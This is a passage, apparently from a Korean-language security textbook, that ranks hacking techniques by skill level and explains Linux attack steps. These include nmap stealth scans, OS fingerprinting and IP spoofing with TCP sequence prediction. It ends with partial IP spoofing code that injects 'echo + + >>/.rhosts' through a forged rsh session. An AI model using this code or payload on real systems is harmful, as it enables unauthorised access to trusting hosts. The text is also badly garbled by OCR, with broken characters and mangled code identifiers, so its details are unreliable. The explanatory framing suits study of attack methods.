첫째로; 해커의 수준분류와 호환되도록 분류하기 위해서이다. 

둘째 로; 비 록 낮은 수준의 해커 라 할지 라도 높은 수준의 해커 에 의해 제 작된 높은 기 
술수준의 해 킹수법을 사용할수 있는데 이 런 경우 해 당 해 킹수법을 낮은 수준의 해 킹수법 
으로 분류해서는 안되기때문이다. 

一 해킹수법 및 수준분류 

■ 체계 및 봉사설정의 취약점 

이 분류에는 체계 및 체계에서 제공하는 각종 봉사의 설정과 관련된 취약점을 리용한 
해킹수법이 포함된다. 체계 및 봉사 설정문제를 리용한 해킹은 그 수준이 그리 높지 않은 
경우가 대부분이 다. 이것은 일반적 인 체 계보안의 취 약점 분석 도구를 리 용하여 발견할수 있 
고 해킹을 위해 특별한 해킹실행코드가 필요없는 경우가 대부분이기때문이다. 

이 분류의 준위 3에 는 파일 체 계 의 쓰기권한취 약점 을 리용하는 경 우와 suid 프로그람 
관리 상의 문제 를 리용하는 경 우，환경변수를 리용하는 경 우가 포함된다. 이 것은 
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어들을 사용할수 있고 이것을 리용하여 체계설정들을 확인할수 있는 경우 해킹에 쉽게 적 
용시킬수 있는 방법들이다. 준위 4 에는 r-series 프로그람의 설정문제， ftp, nfs/nis, dns, 
sendmail, http 봉사기 설정문제， X 창문설정 및 인증문제 기타 데몬의 권한설정 및 월실 
행 가능 여부가 포함된다. r-series 프로그람이 라는것은 rlogin 과 같이 문자 《r》 로 시 작하 
는 각종 프로그람들을 의미한다. 이것은 특별한 인증과정 이 없이 다른 체계 에 접속할수 있 
기때 문에 잘못된 설 정 으로 하여 간단히 해 킹당할수 있다. 통과암호암호화방식 을 리용하여 
간단한 프로그람을 작성 할수 있 어 야 통과암호파괴 (password cracking) 가 가능하므로 통 
과암호역 시 준위 4 에 포함된 다. 통과암호파괴 는 통과암호설 정시 약점 이 있 는 통과암호를 
사용하는 경 우에 발생 할수 있기때 문에 이 부류에 포함된다. 그 외 에 각종 봉사들에 대 한 설 
정문제를 리용한 해 킹은 해 당 봉사에 대 한 충분한 지식 이 필요하기때 문에 준위 4 에 포함 
된 다. 

■ 프로그람의 취약점 

프로그람의 취 약점 은 프로그람작성 과정 의 보안오유와 프로그람동작상의 보안오유로 인 
하여 발생할수 있 다. 후자의 경 우에 는 프로그람 단독으로 문제 가 일 어 나는 경 우도 있지 만 
여 러 프로그람이 동시 에 실행될 경우에 문제 가 발생 하는 경우도 있다. 프로그람동작상의 오 
유로 인한 문제 는 득정 한 프로그람에 대 한 문제 로 권고문형 래 로 알려 지 고 수정 이 가능하 
게 된다. 

프로그람오유를 리용한 수법은 해킹의 핵심이라고 할수 있는데 이 분류에서는 준위 3 
에 CGI/JavaScript 취 약점， ASP, PHP Script 취 약점 을 포함시 켰다. 각종 각본언어의 취 
약점은 기본적으로 각종 원천파일들을 읽을수 있는 능력이 있어야 하기때문이다. 일반적 
으로 각종 각본의 취약점들은 각본자체로 해킹에 리용되는 경우보다는 다른 해킹수법과 련 
관되여 리용되는 경우가 대부분이다. 준위 4 에는 완충기자리넘침공격，더미기억구역자리 
넘침공격，경쟁조건을 포함시켰다. 이것은 가장 기본적이면서도 가장 널리 사용되는 해킹 
수법들이다. 이러한 해킹수법을 익히고 리해하는것과 실제 해킹실행코드를 작성할수 있는 
수준은 다르다. 여 기서는 이 리 한 해 킹수법 을 리해 하고 간단한 해 킹실행 코드를 리해할수 있 
는 수준으로 보고 준위 4 를 부여하였다. 준위 5 에는 Win32 완충기자리넘침，형식문자렬 
공격， OMEGA 프로젝트， Frame Pointer 자리 넘 침공격을 포함시 켰다. 이것은 종전의 해 킹 
수법 과 그 수준차이 는 크게 없지 만 널 리 알려 지 지 않아 일 반적 인 완충기 자리넘 침 해 킹 수 
법 보다 리해 하기 가 어 려 운 해 킹 수법 들이기 때 문이 다. 형 식문자렬 공격 이 나 Frame Pointer 
자리 넘 침공격의 경우에는 최근 널리 활용되기도 하는 공격수법 이 다. 이 수준의 해커들은 우 
의 해킹수법에 대한 리해뿐만아니라 이를 리용한 해킹 실행코드를 리용하여 실제해킹을 실 
행할수 있는 수준이 다. 준위 6에는 프로그람설계상의 보안문제，각종 보안강화도구회 피， 
공유서 고표준입 출력 변경 (Shared Library Redirection) , 종료되지 않은 린접 기 억 기를 리 
용한 자리 넘 침 해 킹 수법 을 포함시 켰 다. 준위 6에 해 당하는 해 킹 수법 은 프로그람설 계 상의 보 
활용할수 있는 수준의 해 킹 수법 으로 프로그람의 흐름을 파악하고 취 약점 을 리해 
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할수 있는 능력 이 있어야 한다. 또한 보안강화도구회피수법은 각종 보안강화프로그람들의 
동작방식을 리해하고 있어 야 하기때문에 준위 6에 포함시켰다. 

■ 통신규약의 취약점 

통신규약의 취 약점 이 란 TCP / IP 뿐만아니 라 각종 인 터네 트통신규약 ( ICMP , ARP , 
RARP , UDP 등)의 설계상의 취 약점 을 말한다. 

통신규약의 취 약점 을 리 용하는 경 우 해커는 각종 통신규약자체 를 리 해 하고 있어 야 한 
다. 따라서 다른 해 킹수법보다 높은 수준이 된다. 일반적으로 통신규약 취 약점을 리용한 해 
킹 은 이 미 작성 된 해 킹프로그람을 리 용하는 경 우가 대 부분이 다. 

본 분류에 서 준위 4에 는 Packet Sniffing , Connection Reset ( ICMP ) 을 포함시 켰 는데 
이 해 킹 수법 은 단순한 망통신규약상의 취 약점 을 리용하는것 으로써 특별 한 능력 이 필 요한 
것 은 아니 기 때 문이 다. 즉 망상에 서 다른 호스트로 전송되 는 파케 트를 수집하여 확인하거 
나 전송되 는 파케 트에 대 해 재 설 정 파케 트를 전송하는것 만으로 실 행 가능한 해 킹 수법 이 기 때 
문이다. 준위 5에는 IP 속이기를 포함시켰는데 IP 속이기는 전송되는 파케트의 머 리부부분 
의 IP 주소만을 변경 시키 는것 이 아니 라 통신하려 는 대 상체 계 의 SYN 번호를 추측하는것 이 
필요하기때 문이 다. 준위 6에는 대 화가로채 기，파케트되돌리 기，경 로조종표변경， ARP 를 리 
용한 MAC 주소조작을 포함시 켰다. 이것은 각종 동신규약에 대 한 구조적 인 문제를 완벽 하 
게 리해 해 야 하고 상당한 수준의 망프로그람작성 능력 이 있 어 야 하기 때 문이 다. 

정보수집 

정보수집이라는것은 취약점분석도구 혹은 체계명령어 등을 리용하여 해킹하려는 체계 
에 대 한 정보를 수집 하는 행위를 말한다. 최근 발견되고있는 대부분의 해 킹시도가 정보수 
집과 관련된것 이다. 

일 반적 으로 정 보수집 에 활용되 는 도구로는 각종 취 약점 전체 를 확인해 주는 취 약점 분석 
도구뿐만아니 라 단순히 특정취 약점 이 나 포구만을 검 색하는 도구들도 존재한다. 최 근에 가 
장 많이 사용되 는 프로그람으로는 nmap 와 nessus 등이 있 다. 최 근에 는 취 약점검 사방법 
의 다양화로 인해 IDS 와 같은 보안도구조차 취 약점검 사를 당하고있 다는것 을 검 출하지 못 
하는 경우가 발생 하기도 한다. 

정보수집 이라는것은 체계에 침투하고 체계내부에서 일정한 권한을 얻어내는 일반적인 
해킹수법은 아니다. 그러나 최근에는 체계의 취약점을 수집하는 정보수집자체도 해킹의 일 
부로 판단하고 해 킹 으로 구분하고있다. 낮은 수준의 해커 라도 다양한 보안스캐 너 ( scanner ) 
를 인터네트상에서 쉽게얻어 사용할수 있다. 물론 일반적으로 해킹을 하려하는 높은 수 
준의 해커 들 역 시 정 보수집 을 위하여 제 작된 보안스캐 너를 그대 로 사용하는 경우가 많은 
데 이것은 빠르고 정확하며 손쉽게 사용할수 있기때문이다. 특히 nessus 나 nmap 의 경우 
에는 decoy scan , stealth scan 등을 실현하여 사용할수 있게 함으로써 비록 낮은 수준의 해 
커 라 하더 라도 높은 수준의 정 보수집기 술을 사용할수 있 다. 
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정보수집과 관련된 해킹 수법에 대해서 단순한 포구훑기 (port scan ) , 간단한 체계명령 
을 리용한 정 보수집 은 준위 2에 포함시 켰 다. 단순한 포구훑기 라는것 은 해 당 포구로 접 근 
을 시도하여 포구가 열 려 있는가를 확인하는 작업 으로서 이것 은 정상적 인 동작으로 인정되 
기때문에 IDS 등에 기록 ( log ) 이 남지않게 된다. 물론 이러한 방법은 체계자체에 기록되 
게 된 다. 이 수법 은 간단한 체 계 명 령 어 인 ping , traceroute 등의 명 령 을 리 용하여 정 보를 
수집 하게 된 다. 준위 3에는 복잡한 체계명령을 리 용한 정보수집，각종 봉사에서 제공하 
는 명령을 통한 정보수집 ， Banner Grabbing 을 포함시켰다. 체계명령을 자세히 알고있는 
경 우에 는 각종 보안스캐 너 를 리용하지 않더 라도 포구훑기 나 취 약점 을 확인 할수 있 다. 이 
런 경 우에 활용되 는 명 령 으로서 는 rpcinfo , showmount 등이 있다. 준위 4에 는 Finger 
Printing , SNMP 를 리 용한 정 보수집 을 포함시 켰는데 이 경 우는 telnet , ftp , http 등 각 
종 봉사에 서 제 공하는 각종 통보로부터 정 보를 확인 하는 경 우와 SNMP 를 리용하여 정 보 
를 얻 어 내는 경우이 다. 특히 SNMP 를 리용하는 경우에는 체 계설정 에 따라 해 당 체계 에 
서 현재 실행되고있는 모든 프로쎄스들에 대한 정보도 얻을수 있다. 준위 6의 경우에는 
Combined Scan/Distributed Scan/Stealth Scan/Decoy Scan , TCP / IP 규약을 리용한 훑 
기 ( scan ) 를 포함시 켰다. 최 근 발표되 고있는 각종 IDS 들이 해 당 망에 대 한 훑기공격 을 검 
출하고있 다. 그러 나 준위 6에 포함되 여 있는 수법 을 사용하는 경 우 효과적 으로 검 출하지 못 
하게 된다. 

봉사거부공격 

최 근에 가장 큰 문제 로 되 고있는 해 킹 수법 들중의 하나가 봉사거 부공격이 다. 특히 분 
산 봉사거부공격의 경우에는 그 피해정도가 매우 크기때문에 많은 보안관련업체들이 관심 
을 가지고 해결하려는 부분이다. 봉사거부공격이란 간단히 말해서 체계가 정상적으로 동 
작하지 않도륵 만드는 공격수법 으로서 체 계의 관리 자권한을 얻 기 위해 시 도되 는 일반적 인 
해킹과는 차이가 있다. 

특히 문제로 되는것은 망을 통하여 원격지에서 체계가 정상적으로 동작하지 않도륵 공 
격 하는 경 우인데 이 런 경 우에 는 공격 대 상의 체 계뿐만아니 라 공격 대 상과 같은 망상에 있는 
다른 체 계 에 도 피 해 를 줄수 있 기 때 문에 더 큰 문제 로 되 고있 다. 

이 분류에서 준위 3에 는 간단한 프로그람작성 으로 실행 할수 있는 국부체 계 상에서 의 봉 
사거부공격을 포함시 켰는데 이것은 비 교적 쉬운 공격방법 으로서 디스크채우기，기 억기고 
갈시키기，프로쎄스의 무한생성 등이 있다. 준위 4에는 SYNFlooding/Ping Flooding , Mail 
Storm , Java Applet Attack/UDP Storm 를 포함시 켰 다. 이 준위는 TCP / IP , ICMP 등 
의 각종 통신규약을 리해 하고있는 경 우에 사용할수 있는 방법 이지 만 그 강도가 그리 높지 
않은 방법 이 다. 준위 5의 경 우에 는 Tear Drop , 일 반 이)…， Smurfing 을 포함시 켰는데 Tear 
Drop 의 경우는 IP Fragmentation 수법에 대한 리해가 필요하고 일반 DDoS 의 경우 대행 

P 뒤문을 설 치하는것 과 같은 수준의 기 술이 필요하기 때 문이 다. 준위 6에 는 암호 
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화된 DDoS 를 포함시 켰는데 실제 로 암호화된 DDoS 는 거 의 모든 해 킹수법 이 포함되 여있 
다고 볼수 있기때문이다. 

악성쿄 E 

악성코드에는 비루스，트로이목마，뒤문 등이 포함되고 여러가지 해킹수법이 포함되 
며 스스로 체 계를 해 킹 하고 자기 복제를 실시 하는 웜 ( worm ) 역시 악성코드에 포함된다. 
여 기서 는 주로 뒤문과 트로이 목마에 대 해서 설명한다. 

최 근에 는 트로이 목마나 뒤문에 매 우 다양화되 고 고도의 기 술이 포함되 고있다. 뿐만아 
니 라 일 반 초보해 커 들조차 쉽 게 사용할수 있을만큼 간단하고 편리한 사용자대 면부를 갖춘 
프로그람들이 발표되 고있 다. 

준위 3의 경 우에 는 인 터네 트봉사를 리용한 관리 자권한의 shell bind , 파일 및 부트비 
루스를 포함시켰다. 인터네트봉사를 리용한 관리자권한의 shell bind 의 경우에는 일단 국 
부체 계 내부에서 관리 자권한을 얻은 후에 inetd.conf 파일을 조작하여 관리 자권한의 월을 련 
결시키는것으로서 매우 간단하다. 준위 4에는 단순한 뒤문프로그람과 암호화비루스를 포 
함시 킨다. 단순한 뒤문프로그람이 란 각종 체 계프로그람에 서 특정 ID 와 통과암호를 입 력 
하는 경우 관리자권한의 쉘을 실행시키도록 만든것이다. 그러나 이러한 뒤문은 파일크기 
와 생성시 간이 원본파일과는 다르기때문에 쉽게 찾아낼수 있다. 준위 5에는 은페형비루 
스，마크로비 루스와 원본과 동일 한 크기 와 생성시 간을 가지 는 뒤문을 포함시 켰다. 준위 6 
에 는 Raw Socket 을 리 용한 shell bind , 대 행 체 형 뒤 문， Reverse telnet , ssh , 핵 심 부준위 
뒤 문， Stealth 뒤 문，각종 월，다형성 비 루스를 포함시 켰다. Raw Socket 를 리 용하여 쉘을 련 
결시키는 경우에는 체계명령 (netstat 등)을 통해 체계에 련결되여있는 련결성정보를 확인 
할수 없게 된다. 핵심부준위뒤문의 경우도 기존의 뒤문확인프로그람을 리용하여 존재여부 
를 확인하는것 이 매 우 어 려 워전다. 때 문에 이 뒤문기 술들을 준위 6에 포함시 킨다. 그리 고 
Windows 용 각종 트로이목마프로그람 (Back Orifice , Sub 7 등)을 준위 6에 포함시킨다. 

기타 

우에서 설명된 분류에 포함되지 않지만 해커의 수준을 측정하는 데 유용한 몇 가지 해 
킹수법들을 이 분류에 포함시켰다. 이 분류에서는 준위 3에 일부 기록삭제를 포함시켰는 
데 이것은 체계에 등록되는 각종 기록파일이 어느 위치에 저장되는가를 알지 못하는 수준 
이기때문이다. 준위 4 에 간단한 암호화알고리듬의 암호해제와 모든 기록삭제를 포함시켰 
는데 모든 기록파일을 삭제함으로써 기록삭제가 이루어진것을 체계관리자가 확인할수 있 
게 되는 수준이 기때문이 다. 준위 5에는 사회 공학적 인 방법과 동과암호주즉，준위 6에는 다 
른 기 록에 영 향없 이 자신의 흔적 제 거 를 포함시 켰 다. 등록정 보가 기 록되 는 파일안에 서 해 
커자신과 관련된 기록만 삭제하는것으로 체계관리자는 아무런 흔적도 찾을수 없게 된다. 

이상과 같이 해커들이 사용하는 해 킹 기술을 분야별로 정 리하여 분류하였으며 각 분야 
에 따르는 해 킹기술의 수준을 부여하여 분류하였다. 해 킹기술에 대 한 준위를 부여할 때 해 
당 수준의 해커가 사용할수 있는 기술에 기본적으로 의존하지 않고 낮은 수준의 해커들도 
높은 수준의 해커 가 작성한 각종 해 킹 프로그람들을 리 용하여 높은 수준의 해 킹 
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용할수 있기때문에 해킹기술자체의 수준을 가지고 준위분류를 진행하였다. 

우에서 언급한 해커 및 해킹기술 수준분류를 리용하면 각종 해킹프로그람의 수준을 정 
의할수 있으며 또한 이것을 리용하여 보안체계들의 수준을 분류할수 있다. 

제2절. 일반적인 해킹수법 

여기서는 기본 LINUX 체계를 대상으로 진행되는 해킹수법들과 대표적인 해킹도구들 
에 대해서 구체적으로 서술한다. 

2.2.1. 기본해킹절차 

LINUX 체계를 대상으로 하는 해킹의 기본절차는 다음과 같다. 

ᄄ 정 보수집 단계 
^권한획득단계 
^ 공격 단계 
ᄄ 재 침 입 단계 

그러면 매 단계들에서 리용되는 해 킹수법들을 구체적으로 고찰하자. 



그림 2-1. 해킹의 기본절차 
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1) 정 보수집단계 

정 보수집은 망공격의 첫번째 단계 로 공격대상의 망에 대 한 정보를 파악하는것 이 다. 주 
로 망위상，조작체계，망장치의 종류，그리 고 WWW , FTP 등 공격대상망이 제공하는 봉 
사와 판본정 보를 수집한다. 정 보수집방법 은 훑기공격 도구를 리용하는것 으로부터 망봉사기 
가 제 공하는 정 보를 수집 하는 방법 에 이 르기 까지 매 우 다양하며 방화벽 을 우회 할수 있는 방 
법 도 존재한다. 

一 체계 및 봉사검출 

공격대상망에 체계가 있는지를 파악하기 위하여 일반적으로 ping 을 리용한다. 

또한 DNS 봉사기를 훑기 ( scan ) 하여 어떠한 체계가 있는지를 파악할수도 있다. 체계 
의 존재여부에 대한 정보수집이 끝나면 매 체계가 어떠한 봉사를 제공하고있는지를 검사 
하기 위하여 열려진 포구를 훑기한다. 

훑기는 통신규약에 대하여 다량의 파케트를 전송하고 호스트의 응답으로부터 호스트 
의 리 용가능한 봉사를 추줄하는것 을 의 미 한다. 해커 의 립 장에서 포구#기 는 공격 을 실시 
하기전에 상대편 호스트가 어떤 봉사를 제공하고있는지를 알아내는 방법이며 여기서 얻은 
정 보는 해 킹 수법 을 선택하는데서 중요한 역 할을 수행한다. 

특히 오유가 있 는 봉사를 집 중적 으로 훑기 하게 되 며 이 러 한 과정 은 nmap , sscan , mscan , 
vanilla scanner 등 포구 및 호스트 훑기 도구를 리용한다. 일반적 으로 체 계의 존재 여부와 
봉사에 대한 훑기는 동시에 이루어진다. 

그러 면 nmap 의 기 능에 대 해서 구체 적 으로 고찰해보자. 

nmap 는 하나의 호스트에 대 한 포구훑기 뿐아니 라 전체 망에 대 하여 흙을수 있 다. 

실례로 대상하는 망이 192.168.1.0/24 라고 한다면 192.168.1 대역의 C Class 전체 
를 검 색하게 된 다. 또한 각종 훑기알고리 듬을 리용하여 망을 고속으로 흙을수 있 다. 

nmap 의 기 본 사용형식은 아래와 같다. 

nmap [ 훑기 류형 ] [옵션] <대상목적지 호스트나 망〉 

기 본적 인 몇 가지 훑기류형 에 대 해서 고찰하자. 

-s S ： TCP SYN 스텔스포구훑기방식 으로서 완전한 tcp 대 화를 만들지 않기 때 문에 반 
열 린 ( half - open ) 훑기 라고 한다. 훑기 하려 는 목적 지 로 SYN 파케 트를 발송한후 목적 지 로부 
터 SYN / ACK 파케 트를 받으면 포구가 듣기 상태 ( listen ) 에 있 다고 판단하고 RST 파케 트를 
받으면 듣기상태에 있지 않다고 판단한다. 만약 SYN / ACK 파케트를 받으면 RST 파케트를 
보냄으로써 훑기가 기록에 남지 않도륵 한다. 

-sT : TCP 포구훑기방식 으로서 connectO 함수를 리 용하여 이 함수가 성 공하면 해 당 포 
구는 듣기 상태 에 들어 가고 실패 하면 듣기상태 에 들어 가지 않는다고 판단한다. 이 방법 은 가 
장 기 본적 인 tcp 포구훑기 형 래 로서 root 뿐만아니 라 일 반사용자들도 사용할수 있으며 훑기 
할 때 기록이 남게 된다. 
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-sU : UDP 포구훑기방식 으로서 어 떤 포구가 열 려있는지 훑기하려 고할 때 사용한다. 
이 방법 은 매 포구에 Obyte 의 udp 파케 트를 보낸후 만일 ICMP port unreachable 통보를 수 
신하면 해당 포구는 닫겨 있는것 이고 그렇지 않으면 포구는 열려 있는것 이라고 판단한다. 
하지만 LINUX 체계에서는 ICMP 오유의 비률을 제한하고있기때문에 훑기결과가 매우 느 
리게 된다. LINUX 체계에서 destination unreachable message 의 경우 4 s 당 80회로 제 
한하고있 다. 

-sP : ping 훑기방식 으로서 해 당 망에서 어 떤 호스트가 살아있는지 를 알고 싶을 때 사 
용한다. 이 옵션을 사용하는 경우 nmap 는 지정 한 망의 모든 IP 주소로 ICMP echo request 
packet 를 발송한후 응답이 오면 망 호스트가 망에 련결되여 있다고 판단한다 . 

그러 나 일부 싸이트이 인 경 우 안전을 위해 ICMP echo request 파케 트를 차단하는 경 
우도 있다 . 

이 리 한 경 우에 는 80번과 같은 특정 한 포구 번호로 TCP ack 파케 트를 보내 여 만일 RST 
파케트를 받았다면 해당 체계는 살아있다고 판단한다 . 

- sF ，- sX，_sN : 스텔 스 FIN , Xmas , Null 훑기방식 으로서 SYN 파케 트를 차단한 방화 
벽 을 통과하거 나 훑기 를 검 출하는 프로그람들이 인식하지 못하도록 할수 있 다. 만일 FIN 
파케트를 발송하여 RST 파케 트가 응답하면 해 당 포구는 닫겨져 있는것 이 고 아무런 응답이 없 
으면 이 포구는 열린것 으로 판단한다 . 

一 OS 검출 

좀더 세밀한 공격을 위하여 해당 체계의 OS 판본에 대한 정보를 수집한다. 

보안에서의 취 약점 (security hole ) 은 OS 에 따라서 다르며 OS 마다 다른 해 킹수법 이 존 
재하기때문에 OS 를 검출하는것은 해킹의 중요한 단계이다. 

OS 판본을 검 출하는 기 술은 'IP stack fingerprinting ’’ 이 라는 특성 을 리 용한다. 체 계 
에 따라 IP stack 의 실 현 방식 이 다른 점 을 리용하여 특정 파케 트를 만들어보내 여 그 응답 
에 따라 체 계 를 구별 해 내 는 방법 이 다. 대 표적 인 도구로는 queso , nmap 를 들수 있 다. 

一 망위상 및 방화벽규칙 검출 

망위상은 호스트간의 거리를 나타내는 ’’hop count ” 를 리용하여 알아낼수 있으며， 
M traceroute M 프로그람을 응용한 공격 도구를 리 용한다. 또한 방화벽 에 의 해 보호되 는 체 
계 에 대 한 정보 및 방화벽 자체의 파케트러과규칙정 보를 수집하는 방법도 존재한다. 이 러 
한 공격 은 대 부분의 방화벽 이 려 과하지 않는 특정 한 ICMP 파케 트나 udp 를 리 용한 traceroute 
파케 트를 리 용하며 대 표적 인 공격 도구로는 Firewalk , hping , nmap 등이 있 다. 

— 망봉사기의 정보수집 

DNS , SNMP , Sendmail , NetBIOS 등 일반적 인 망봉사기 가 제공하는 정보를 수집 
하여 공격에 유용하게 사용할수 있다. DNS 의 경우 ’’zone transfer " 또는 일반적인 질문 
리용하여 등록된 호스트의 정 보를 알수 있 다. 또한 경 로기 를 통하여 중요한 정 
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보를 알아낼수 있는 방법 도 존재한다. 

《정보수집단계》는 공격대상의 망에 어떠한 호스트가 있으며 이 호스트가 어떠한 봉 
사를 제공하는가 그리고 망이 어떻게 구성되여 있는가를 파악하여 최종공격대상을 찾아내 
는 단계 이 다. 

2) 권한획득단계 

목표로 정 한 호스트내 부에 침 입 하여 월 ( shell ) 을 사용할수 있는 사용자의 권한을 얻 
어 내며 이로부터 관리자권한까지 얻는 단계 이다. 

一 목표호스트와의 련결확립 

정 상적 인 접 속요청 을 발송하여 대 상호스트와의 련결 을 확립한다. 

만일 공격대상의 호스트가 믿음성이 있는 호스트와만 련결확립을 요구한다면 그 믿음 
성이 있는 호스트의 IP 주소로 가장하여 련결을 설정할수 있다. 즉 IP 속이기공격기술을 적 
용할수 있다. IP 속이 기공격 기 술은 TCP / IP 통신규약의 취 약점 을 리용한 고급한 해 킹 기술 
의 하나이다. 

IP 속이 기공격 기술에 대 해서 구체 적 으로 보자. 

IP 속이기공격은 말그대로 호스트의 IP 주소를 바꾸어서 이것을 통하여 해킹을 하는것 
이다. 가령 호스트 A 와 호스트 묘가 하드디스크를 공유하고있 는데 호스트 A 와 호스트 B 
는보안이 잘 되여서 해킹하기가 매우 어렵다고 하자. 

하지만 어떻게든 호스트 묘안에 있는 일급극비문서를 훔쳐오고싶다면 어떻게 해야 할 
것인가? 

해커는 다음과 같이 동작할수 있다. 우선 자신의 호스트(해커)의 IP 주소를 묘의 주소 
로 위 장을 한다. 위 장을 하면 호스트 묘의 화면에 는 duplicated IP address 라는 통보가 출 
력되고 호스트 묘는 망기능을 잠시 상실하게 된다. 

이때를 놓치지 않고 해커의 호스트는 호스트 A 에게 자신이 진짜 호스트 B 라는 정보 
를 보내 여 호스트 A 와 같이 하드디 스크를 공유하기 위해 시 도한다. 성 공하게 되 면 해 커 
는 호스트 A 의 하드디 스크에 있는 극비 문서 를 호스트 A 나 호스트 묘에 잡입 하지 않고도 얻 
어낼수 있게 된다. 

또한 IP 속이 기 와 항상 련동되 여 사용되 는 공격 수법 으로 TCP 순서번 호 예 측공격 을 실 
례 들수 있 다. 이 에 대 해서 간단히 고찰해보자. 

A 와 B 라는 호스트가 서 로를 믿는다고 가정 하자. 자신의 를퓨터의 IP 주소를 B 라는 호 
스트로 바꾸고 A 에게 접근하면 가능성이 있지 않겠는가하고 추측할수도 있지만 자신의 위 
치가 B 라는 호스트가 위치한 곳으로부터 A 보다 훨씬 더 시간적으로 유리 한 위치에 있을 때 
에만 가능할수 있 다. 그외 의 경 우에 는 거 의 불가능하다고 볼수 있 다. 

자신의 IP 주소를 변경 해 도 B 라는 믿 음성 이 있는 호스트가 A 에 게 로 도달하는 
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뿐만아니 라 자신이 속해 있는 부분망에서 다른 IP 주소를 가진 파케트를 전송한다는것은 경 
로조종상의 문제를 비롯하여 어려가지 문제점들이 제기될수 있다. 

그러면 IP 속이기공격에 대해서 구체적으로 고찰하면서 TCP 순서번호를 어떻게 예측 
할수 있겠는가에 대하여 고찰해보자. 

해커의 호스트를 hacker.mm 이라고 하고 공격대상의 호스트를 target.com 이라고 하자. 

또한 target , mm 과 서 로 믿 음성관계 에 있는 호스트를 good , com 이 라고 하자. 

target , com # cat / . rhosts 
good , com root 
target , com # 

간단히 hacker , com 의 IP 주소를 good , com 의 IP 주소로 바꾼 다음에 target , com 의 rsh 
봉사기에 접속하려 한다고 하자. 이 경우에는 TCP 가 가지고 있는 초기 3단계 련결확립 
과정을 거처야 하기때문에 련결이 이루어지지 않는다. TCP 의 초기 3단계 련결확립과정 
의 실례를 들어보자. 

hacker . com # telnet target.com login 할 경우 
hacker , com -> target , com SYN 1415531521 
// hacker , com 이 초기 순서번호를 보낸 다. 
target , com -> hacker , com ACK 1415531521 SYN 1823083521 

// target . com 이 hacker . com 이 보낸 ISN 에 대해서 응답하고 target . com 이 자신 
의 초기순서번 호를 보낸 다. 
hacker , com -> target , com ACK 1823083521 

// hacker.com 이 target.com 의 ISN 에 대해서 응답한다. 

우와 같은 파케 트가 교환된다. TCP 머 리부의 SYN 기 발은《 비 동기적 인 순서번호》이 
다. SYN 기 발은 TCP 순서번호를 동반하는데 이 수자는 TCP/IP 실현방식 에 따라서 생성 되 
는 방법이 약간씩 다르다. 4.4 BSD 에서는 체계가 초기화될 때 1로 초기화되고 그 후는 0.5 s 
마다 64000씩 증가한다. 또한 새 로운 TCP 련결 이 만들어질 때마다 64000씩 증가한다. 

단순히 hacker , com 의 IP 주소를 바꾸는것 만으로는 target , com 이 hacker , com 에 게 보 
내 는 ISN 을 받을수가 없기 때 문에 (왜 냐하면 target , com 은 good , com 에 게 ISN 을 보내 기 
때문이다.) 따라서 련결이 성립되지 않는다. 련결이 확립되려면 good , com 은 target , com 
이 보내는 ISN 파케트에 대해서 응답하지 말아야할뿐만아니라(보통 good , com 은 이런 경 
우 RST (련결 재 설정 ) 파케 트를 전송하여 야 한다. ) target , com 이 good , com 에 게 보낸 ISN 
을 추측하여 응답 ( ACK ) 하여야 한다. 이 과정 이 완료되였을 때 《echo ’+ +’ > /. rhosts 》 
지령을 포함한 rsh 파케트를 전송하여 목적을 이룰수가 있다. 
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IP 속이기의 대 략적 인 코드를 보면 다음과 같다. 


코드 1. IP 속이기 코드 

hose_conn ( trust _ host , trust _ addr , seq _ num , port _ num ) 

{ 

/* sendtcppacket ( 

struct ether_addr source_hardware addr . 

struct ehter_addr dest_hardware addr . 

u_long source ip addr . 

u_long dest ip addr . 

u_short source port . 

u_short dest port . 

u_long sequence no . 

u_long acknowledge no . 

int flags ( SYN , RST , ACK , PUSH , FIN ) 

char * data 

int strlen ( data )) 

*/ 

sendtcppacket (& ( eh . ether _ shost ), 技 ( eh . ether _ dhost ), bad _ addr , 

trust _ addr , port_num [ i ], 513, seq _ num , 0, TM _ SYN , NULL , 0); 


det_seq ( targ _ host , targ _ addr , next _ seq , offset ) 

{ 

/* 련결을 요구하는 파케트의 전송 */ 

sendtcppacket (& ( eh . ether _ shost ) , & ( eh . ether _ dhost ) , my _ addr , targ _ addr , 
start _ port , 514, start _ seq , 0, TM _ SYN , NULL , 0); 

/* readpacket ( 

struct fddi_header fddi_header 

struct ether_header ether_header 

struct ip ip_header 

struct udphdr udp_header 

struct tcphdr tcp_header 

char * data 

int strlen ( data ) ) 

*/ 

while (readpacket ( NULL , & eh 2, & iph , NULL , & tcph , NULL , NULL ) 卜 
PTYPE _ IP _ TCP ) ； 

if(ntohs ( tcph . th _ dport ) == start_port && ntohs ( tcph . th _ sport ) ==514) 

{ 

/* 포구번호가 맞다면 재시도 ( reply ) 파케트로 간주하고 추측을 시 작한매ᄂ*/ 
_ if ( prev _ seq ) di 伴 = tcph . th _ seq ~ prev_seq ；_ 
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else di 伴=0; 

if (* offset ==0) *o 伴 set=di 伴; 
prev _ seq = tcph . th_seq ； 

sendtcppacket (技 ( eh . ether _ shost ) ， & ( eh _ ether _ dhost ) ， my _ addr , targ _ addr , 
start _ port ++, 514, start _ seq ++, 0, TM _ RST , NULL , 0); 

} 

spoof—conn ( trust _ addr , targ _ host , targ _ addr , next _ seq ) 

{ ᅮ ᅮ 

char * string = n 0\0 root \0 root \0 echo + + >>/. rhosts \0 M ； 

/* SYN 파케 트를 고유한 순서번호에 맞추어 전송 */ 
sendtcppacket (& ( eh . ether _ shost ) , & ( eh . ether _ dhost ) , trust _ addr , targ _ addr , 
port , 514, seq ++, 0, TM _ SYN , NULL , 0); 
usleep (5000) ； 

/* 추측한 순서번 호에 맞추어 ACK 파케 트를 전송 */ 
sendtcppacket (& ( eh . ether — shost ) , & ( eh . ether _ dhost ) , trust _ addr , targ _ addr , 
port , 514, seq , ++ next _ seq , TM _ ACK , NULL , 0) ； 

/* rsh request 를 순서번호와 ACK 번호에 맞추어 전송 */ 
sendtcppacket (& ( eh . ether _ shost ) , & ( eh . ether _ dhost ) , trust _ addr , targ _ addr , 
port , 514, seq , next _ seq , TM _ ACK , string , stringlen ) ； 
seq += stringlen ； 

h 전송한 파케트가 응답 ( ACK ) 되여 처리되기를 기다린다 */ 
sleep (1) ； 

/* 새 로운 순서번호에 맞추어 FIN 파케 트를 전송 */ 
sendtcppacket (& ( eh . ether _ shost ) , & ( eh . ether _ dhost ) , trust _ addr , targ _ addr , 
port , 514, seq , next _ seq , TM _ FIN , NULL , 0); 

/* RST 파케트 전송，련결 폐기 */ 

